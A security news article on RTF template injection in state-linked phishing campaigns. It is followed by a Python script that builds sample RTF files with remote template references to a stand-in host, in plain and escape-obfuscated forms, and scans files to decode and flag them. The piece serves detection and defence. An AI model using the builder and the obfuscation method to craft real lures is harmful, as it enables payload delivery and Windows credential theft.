RTF injection is increasingly used for phishing by government sponsored hackers

Tech Highlights:

  • This technique is a simple but effective way to download malicious content from a remote URL, and security researchers believe it will soon be adopted by a larger number of threat actors.

  • In their latest phishing attacks, three APT groups linked to India, Russia, and China were discovered using a novel RTF (Rich Text Format) template injection approach.

Researchers at Proofpoint spotted the first cases of weaponized RTF template injection in March 2021, and since then, actors have been steadily optimizing the technique.

Rich Text Format (RTF) files are a document format created by Microsoft that can be opened using Microsoft Word, WordPad, and other applications found on almost all operating systems.

A simple method to fetch payloads

An RTF file can reference an RTF template, a separate document that specifies how the text should be formatted. The reference is meant to point at a file on the local machine, which the RTF reader loads before rendering the document so that the content is formatted correctly.

While RTF Templates are meant to be hosted locally, threat actors are now abusing this legitimate functionality to retrieve a URL resource instead of a local file resource.

This substitution lets a threat actor load a malicious payload into an application such as Microsoft Word, or force NTLM authentication to a remote URL in order to harvest Windows credentials. Furthermore, because the malicious content arrives later as the remote template, the RTF lure itself contains no payload at delivery time, which makes it more likely to slip past detection.

Creating a remote RTF template reference is simple: all a threat actor has to do is add a {\*\template URL} destination to an RTF file, which can be done with a hex editor (or any text editor, since RTF is plain text).

[Figure: A URL-hiding example created by Proofpoint's researchers]

The method also works on RTF files opened in Microsoft Word, including RTF content carrying a .doc extension, forcing the application to retrieve the resource from the specified URL before serving the content to the victim.

Cases of abuse in the wild

Proofpoint has observed this payload retrieval method in phishing campaigns by the India-aligned DoNot Team, the Russia-linked Gamaredon group, and the China-linked TA423 threat actors.

[Figure: Timeline of activities relevant to RTF template injection]

RTF readers accept 16-bit Unicode escapes (\uN control words), so threat actors have been writing the injected URL as a sequence of Unicode escapes rather than a plaintext string to evade detection. The obfuscation is not always done correctly, however: in some DoNot Team samples, Proofpoint found that the escaped reference failed Microsoft Word's checks, and Word displayed an error stating that the remote source was invalid.
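The mechanism described in the two sections above (the {\*\template URL} destination, and the Unicode-escaped form of the URL), as an added worked example that is not part of this article or of Proofpoint's research: a small Python script that builds inert RTF samples carrying plain, Unicode-escaped and hex-escaped template references, and a scanner that decodes the escapes and flags references that point off-host. The URL under example.invalid, the file names and the sample body text are constructed for the example; the \'hh hex-escape variant goes beyond what the article mentions and is included because it is a standard RTF escape that readers decode in the same way.

```python
import re
import sys

# Constructed, inert target for the samples below: example.invalid never resolves,
# so nothing is fetched even if one of these files is opened in Word.
SAMPLE_URL = "http://example.invalid/template.dotm"


def rtf_unicode_escape(text: str) -> str:
    """Write every character as an RTF \\uN escape (N is a signed 16-bit decimal)
    followed by '?' as the fallback glyph for readers that cannot render \\u.
    This is the obfuscation style the article attributes to the actors."""
    out = []
    for ch in text:
        n = ord(ch)
        if n > 0x7FFF:           # RTF stores code points as signed 16-bit values
            n -= 0x10000
        out.append(f"\\u{n}?")
    return "".join(out)


def rtf_hex_escape(text: str) -> str:
    """Alternative escaping with \\'hh byte escapes (added generalisation; not in
    the article, but a standard RTF escape that readers decode as well)."""
    return "".join(f"\\'{b:02x}" for b in text.encode("latin-1"))


def build_rtf(template_ref: str, body: str = "Quarterly figures attached.") -> str:
    """Minimal RTF document whose header carries a template destination,
    {\\*\\template <ref>}. The reference is passed through verbatim."""
    return "{\\rtf1\\ansi\\deff0{\\*\\template " + template_ref + "}" + body + "}"


# One-pass tokenizer for the three RTF escapes that can hide a URL:
#   \uN<fallback>   16-bit Unicode escape plus its fallback (a char or a \'hh escape)
#   \'hh            8-bit hex escape
#   \\ \{ \}        escaped control symbols
_TOKEN = re.compile(
    r"\\u(-?\d+) ?(?:\\'[0-9a-fA-F]{2}|.)|\\'([0-9a-fA-F]{2})|\\([\\{}])", re.DOTALL)
_TEMPLATE = re.compile(r"\{(?:\\\*)?\\template(?![a-zA-Z]) ?([^}]*)\}", re.DOTALL)
_REMOTE = re.compile(r"^(?:https?|ftp|file)://|^\\\\", re.IGNORECASE)


def decode_rtf_text(raw: str) -> str:
    """Collapse RTF escapes back to plain text. Assumes the default \\uc1,
    i.e. exactly one fallback unit after each \\uN (a simplification)."""
    def repl(m: re.Match) -> str:
        if m.group(1) is not None:
            return chr(int(m.group(1)) & 0xFFFF)
        if m.group(2) is not None:
            return chr(int(m.group(2), 16))
        return m.group(3)
    return _TOKEN.sub(repl, raw)


def find_template_refs(rtf: str) -> list:
    """Return every template destination with its raw and decoded reference,
    whether it points off-host, and whether the raw form used escapes."""
    refs = []
    for m in _TEMPLATE.finditer(rtf):
        raw = m.group(1).strip()
        decoded = decode_rtf_text(raw).strip()
        refs.append({
            "raw": raw,
            "decoded": decoded,
            "remote": bool(_REMOTE.match(decoded)),
            "obfuscated": ("\\u" in raw) or ("\\'" in raw),
        })
    return refs


def scan_file(path: str) -> list:
    """Scan an on-disk RTF; RTF is 7-bit ASCII, so latin-1 is a lossless decode."""
    with open(path, "rb") as fh:
        return find_template_refs(fh.read().decode("latin-1"))


if __name__ == "__main__":
    samples = {
        "plain":   build_rtf(SAMPLE_URL),
        "unicode": build_rtf(rtf_unicode_escape(SAMPLE_URL)),
        "hex":     build_rtf(rtf_hex_escape(SAMPLE_URL)),
        "local":   build_rtf("C:\\\\Templates\\\\Normal.dotm"),  # \\ is RTF for one backslash
    }
    for name, doc in samples.items():
        for ref in find_template_refs(doc):
            verdict = "REMOTE template" if ref["remote"] else "local template"
            print(f"{name:8} {verdict:16} obfuscated={ref['obfuscated']!s:5} -> {ref['decoded']}")
    for path in sys.argv[1:]:
        for ref in scan_file(path):
            print(f"{path}: remote={ref['remote']} obfuscated={ref['obfuscated']} -> {ref['decoded']}")
```

Run it with no arguments to scan the built-in samples, or pass paths to .rtf files to scan those; any reference that decodes to an http(s), ftp, file or UNC path is reported as remote. A signature that only looks for the literal string "http" inside the template destination misses the escaped forms, which is why the decode step comes before the remote check.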
